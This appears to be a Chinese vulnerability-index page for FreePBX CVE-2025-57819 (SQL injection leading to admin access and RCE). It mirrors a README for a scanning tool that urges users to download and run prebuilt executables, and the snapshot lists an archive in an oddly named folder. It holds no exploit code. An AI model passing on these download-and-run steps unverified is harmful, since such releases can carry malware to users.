关联漏洞
标题:
FreePBX 安全漏洞
(CVE-2025-57819)
描述:FreePBX(前称Asterisk Management Portal)是FreePBX项目的一套通过GUI(基于网页的图形化接口)配置Asterisk(IP电话系统)的工具。 FreePBX 15.0.66版本和17.0.3之前版本存在安全漏洞,该漏洞源于用户数据清理不足,可能导致未经验证访问管理员界面及远程代码执行。
描述
🔍 Detect SQL injection risks in FreePBX's admin interface safely and efficiently, providing actionable insights and clean JSON reports for security teams.
介绍
# 🛠️ CVE-2025-57819_FreePBX-PoC - Simple SQL Injection Checker for Your Needs
## 📥 Download Now
[](https://github.com/JakovBis/CVE-2025-57819_FreePBX-PoC/releases)
## 🚀 Getting Started
Welcome to the **CVE-2025-57819_FreePBX-PoC** project. This application allows you to safely check for SQL Injection vulnerabilities in FreePBX. It uses simple techniques to provide accurate results without harming your system.
### 📋 Features
- **Read-Only Operation:** No changes made to your system.
- **Multi-Method Detection:** Utilizes error, boolean, and time-based techniques.
- **Detailed Reporting:** JSON format for easy understanding.
- **Per-Parameter Verdicts:** Check each parameter individually for vulnerabilities.
- **User-Friendly Interface:** Designed for those with no programming background.
## 🖥️ System Requirements
To run this application, you need:
- A computer with Windows, macOS, or Linux.
- At least 1 GB of RAM.
- A stable internet connection.
## 📂 Download & Install
To get started, follow these steps:
1. **Visit the Release Page:** Go to the [Releases page](https://github.com/JakovBis/CVE-2025-57819_FreePBX-PoC/releases) on GitHub.
2. **Select Latest Version:** Look for the latest version available.
3. **Download the Application:**
- Click the download link for your operating system. The application is often provided in formats like `.exe` for Windows, `.dmg` for macOS, and `.tgz` or `.zip` for Linux.
4. **Run the Application:** After downloading, open the file and follow the on-screen instructions to launch the checker.
## ⚙️ How to Use the Application
1. **Start the Checker:** Open the application you downloaded.
2. **Enter Your Target:** Input the FreePBX URL or IP address you want to check.
3. **Choose Options:** Select from the available detection methods based on your need.
4. **Run the Check:** Press the start button to begin the check.
5. **View Results:** After completion, review the JSON report to understand the findings.
## 📝 Understanding the Report
The output is presented in a JSON format, which is structured for clarity. Each parameter checked will have its own section that details whether it is vulnerable or not.
Example section in the JSON report:
```json
{
"parameter": "username",
"vulnerable": false,
"details": "No injectable parameters found."
}
```
This format makes it easy for anyone to read and interpret the results.
## 🛠️ Troubleshooting Common Issues
- **Error Starting Application:** Ensure you have the necessary permissions to run the file.
- **Invalid URL Error:** Double-check the FreePBX address you entered. It should be reachable.
- **No Results Shown:** Review your network connection and confirm that the target FreePBX is running.
## 🌐 Get More Help
If you encounter challenges or have questions, check the project’s GitHub for additional information or ask in the issues section. The community can provide support and share tips.
## 📣 Feedback
Your feedback helps improve this project. If you find bugs or have suggestions, please report them on the GitHub issues page.
## 🔗 Explore More
Discover related topics and tools in the security space:
- **Asterisk:** A powerful open-source framework for building communications applications.
- **SQL Injection Protection:** Learn about methods to prevent SQL Injection.
- **Penetration Testing:** Gain insights into testing for vulnerabilities in systems.
For more information, visit the [Releases page](https://github.com/JakovBis/CVE-2025-57819_FreePBX-PoC/releases) to stay updated on the latest features and updates.
文件快照
[4.0K] /data/pocs/1db26aef66bbfd57819aa97273255847c9a94a54
├── [ 15K] freepbx_sqli_checker.py
├── [1.0K] LICENSE
├── [3.6K] README.md
├── [2.5K] SECURITY.md
└── [4.0K] unlatticed
└── [1.3M] CVE-2025-57819_FreePBX-PoC.zip
1 directory, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。